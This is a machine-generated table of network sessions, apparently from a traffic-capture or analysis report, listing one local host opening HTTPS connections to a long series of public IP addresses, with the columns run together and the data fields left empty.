                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9990192.168.2.2352036147.90.166.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9991192.168.2.234619640.21.245.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9992192.168.2.233630246.208.85.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9993192.168.2.233868486.84.114.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9994192.168.2.235646878.97.7.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9995192.168.2.234246442.78.87.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9996192.168.2.233331832.99.143.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9997192.168.2.2349020100.169.69.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9998192.168.2.236091670.101.147.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9999192.168.2.234748689.14.158.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10000192.168.2.2352002114.201.25.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10001192.168.2.233680440.71.208.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10002192.168.2.2353748137.47.202.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10003192.168.2.2357386103.184.6.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10004192.168.2.234019093.188.88.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10005192.168.2.2340628193.16.91.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10006192.168.2.2336584156.99.166.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10007192.168.2.2336372212.231.111.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10008192.168.2.2348888166.214.54.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10009192.168.2.2341880137.102.244.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10010192.168.2.233691653.199.184.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10011192.168.2.235313844.119.199.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10012192.168.2.2357676216.23.242.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10013192.168.2.2353118192.244.255.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10014192.168.2.235433057.104.121.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10015192.168.2.235023086.14.101.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10016192.168.2.235473267.14.62.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10017192.168.2.233524652.93.244.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10018192.168.2.2342000103.126.127.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10019192.168.2.233523659.87.201.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10020192.168.2.2353840102.225.92.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10021192.168.2.2339232188.167.228.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10022192.168.2.235058839.65.86.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10023192.168.2.235636082.12.98.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10024192.168.2.233927085.202.96.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10025192.168.2.2340600177.158.17.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10026192.168.2.2344374186.160.113.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10027192.168.2.233519647.122.101.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10028192.168.2.235454044.249.227.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10029192.168.2.2338760173.16.102.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10030192.168.2.2355644134.37.217.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10031192.168.2.234603648.36.153.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10032192.168.2.233985018.132.180.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10033192.168.2.2339154172.230.59.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10034192.168.2.2353060187.245.174.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10035192.168.2.2344646167.244.88.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10036192.168.2.2348450114.209.126.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10037192.168.2.2350282162.185.168.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10038192.168.2.234307293.215.231.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10039192.168.2.2355836182.173.161.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10040192.168.2.234055414.163.80.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10041192.168.2.235557218.121.18.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10042192.168.2.2343580222.101.224.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10043192.168.2.2350040190.248.20.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10044192.168.2.2338436151.116.79.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10045192.168.2.233901651.26.13.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10046192.168.2.234250613.17.102.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10047192.168.2.2344546202.127.219.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10048192.168.2.2357318150.191.128.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10049192.168.2.234619259.208.219.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10050192.168.2.234988273.237.214.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10051192.168.2.2350238132.240.63.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10052192.168.2.2333368173.160.133.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10053192.168.2.2335620204.26.226.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10054192.168.2.2334194130.118.165.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10055192.168.2.2334700160.182.195.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10056192.168.2.2360866209.212.88.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10057192.168.2.2348740182.168.170.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10058192.168.2.2349916125.147.31.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10059192.168.2.2338102166.191.34.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10060192.168.2.235946254.208.78.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10061192.168.2.2337546209.165.82.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10062192.168.2.236004419.187.62.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10063192.168.2.236063652.58.147.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10064192.168.2.2334946183.4.62.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10065192.168.2.233590487.0.216.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10066192.168.2.2342640115.92.142.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10067192.168.2.2345052201.151.245.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10068192.168.2.234721412.170.109.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10069192.168.2.2338158179.72.151.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10070192.168.2.233713024.56.220.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10071192.168.2.2335190155.76.36.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10072192.168.2.2342754181.235.6.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10073192.168.2.2357848148.13.116.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10074192.168.2.2357956222.82.228.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10075192.168.2.2357012177.174.218.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10076192.168.2.2341032119.238.106.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10077192.168.2.234809637.80.130.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10078192.168.2.2344850209.211.244.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10079192.168.2.2335208170.111.81.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10080192.168.2.2346274110.83.3.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10081192.168.2.2340430119.95.244.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10082192.168.2.234236274.156.112.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10083192.168.2.2344952101.65.160.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10084192.168.2.233692097.41.35.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10085192.168.2.234668699.166.186.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10086192.168.2.235481497.161.119.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10087192.168.2.235096885.2.144.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10088192.168.2.2345824219.241.38.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10089192.168.2.2360530142.180.111.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10090192.168.2.23395904.46.58.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10091192.168.2.2359996113.115.189.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10092192.168.2.2335206178.149.250.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10093192.168.2.234068262.177.201.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10094192.168.2.2358658208.158.21.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10095192.168.2.2345740149.64.214.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10096192.168.2.2350526223.134.19.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10097192.168.2.2359874176.186.91.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10098192.168.2.2342154177.79.254.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10099192.168.2.235845451.87.220.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10100192.168.2.2338140170.92.167.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10101192.168.2.2351560115.164.45.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10102192.168.2.2355528168.154.104.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10103192.168.2.2353430168.134.243.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10104192.168.2.234193652.103.27.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10105192.168.2.233316235.153.23.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10106192.168.2.2344626190.232.169.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10107192.168.2.23511204.36.89.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10108192.168.2.234113087.30.161.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10109192.168.2.234664897.239.202.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10110192.168.2.2340706112.231.4.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10111192.168.2.2346908201.61.115.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10112192.168.2.233793450.24.27.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10113192.168.2.2336142142.181.156.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10114192.168.2.2352448171.65.96.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10115192.168.2.2357238144.40.3.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10116192.168.2.235815447.202.43.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10117192.168.2.2340726163.95.6.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10118192.168.2.2345950202.174.248.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10119192.168.2.2354720190.160.120.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10120192.168.2.2336698217.87.91.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10121192.168.2.233499297.158.189.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10122192.168.2.2354202219.164.219.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10123192.168.2.234502434.56.211.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10124192.168.2.2334882210.34.100.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10125192.168.2.233546480.210.21.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10126192.168.2.2348692178.118.116.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10127192.168.2.235946424.112.216.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10128192.168.2.234897474.211.225.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10129192.168.2.2349162163.23.49.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10130192.168.2.2356612170.37.233.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10131192.168.2.2343342212.144.112.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10132192.168.2.235074295.128.145.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10133192.168.2.2346254138.67.153.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10134192.168.2.235439272.232.149.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10135192.168.2.2343944160.126.236.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10136192.168.2.2357530200.96.87.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10137192.168.2.2332982204.82.53.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10138192.168.2.235088896.242.65.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10139192.168.2.2356796189.101.70.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10140192.168.2.2360162143.224.17.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10141192.168.2.235037019.76.191.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10142192.168.2.235206854.196.221.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10143192.168.2.235023894.49.133.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10144192.168.2.2357638183.135.16.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10145192.168.2.233733858.185.115.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10146192.168.2.2357218157.38.200.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10147192.168.2.2340352112.67.1.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10148192.168.2.2345432109.193.51.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10149192.168.2.23393961.84.175.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10150192.168.2.2336956211.202.23.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10151192.168.2.233757037.179.244.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10152192.168.2.235380852.125.16.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10153192.168.2.235641670.20.16.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10154192.168.2.2346178165.138.19.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10155192.168.2.233417214.126.146.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10156192.168.2.235701224.134.23.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10157192.168.2.235118063.10.240.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10158192.168.2.233294864.30.34.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10159192.168.2.2334840220.123.65.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10160192.168.2.2346850187.255.66.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10161192.168.2.2342358188.93.93.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10162192.168.2.2336472115.41.5.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10163192.168.2.235015862.54.119.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10164192.168.2.233363885.139.15.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10165192.168.2.2341942124.34.34.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10166192.168.2.2332778156.169.190.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10167192.168.2.235648244.64.62.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10168192.168.2.2354522147.235.204.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10169192.168.2.2340576222.159.186.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10170192.168.2.233518897.223.125.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10171192.168.2.2333630166.157.63.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10172192.168.2.2354838155.165.186.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10173192.168.2.2338914159.57.15.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10174192.168.2.235445042.237.185.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10175192.168.2.2341026192.160.114.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10176192.168.2.233587443.41.88.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10177192.168.2.2343604119.193.53.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10178192.168.2.2352974146.234.0.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10179192.168.2.234942237.39.180.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10180192.168.2.234517466.55.224.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10181192.168.2.235032019.70.9.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10182192.168.2.2356386217.129.12.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10183192.168.2.2360976145.49.243.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10184192.168.2.234893047.1.176.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10185192.168.2.2338100125.236.186.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10186192.168.2.234374427.93.51.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10187192.168.2.2342436105.46.20.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10188192.168.2.2336332140.6.104.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10189192.168.2.235351635.48.171.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10190192.168.2.234713283.91.131.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10191192.168.2.233550864.138.17.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10192192.168.2.2346060107.167.180.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10193192.168.2.2335082157.248.173.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10194192.168.2.2350594167.156.158.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10195192.168.2.234216623.3.220.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10196192.168.2.234010862.253.248.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10197192.168.2.234873484.21.145.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10198192.168.2.234930492.142.67.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10199192.168.2.234706057.128.86.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10200192.168.2.2350188132.205.129.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10201192.168.2.234182840.187.249.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10202192.168.2.2347692114.11.255.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10203192.168.2.2347464197.249.113.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10204192.168.2.235234865.217.22.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10205192.168.2.234196836.57.91.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10206192.168.2.23336522.44.133.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10207192.168.2.235327650.14.219.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10208192.168.2.233975265.173.148.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10209192.168.2.2337144203.175.187.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10210192.168.2.2347532107.149.133.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10211192.168.2.2348176171.189.105.188443
                                          TimestampBytes transferredDirectionData


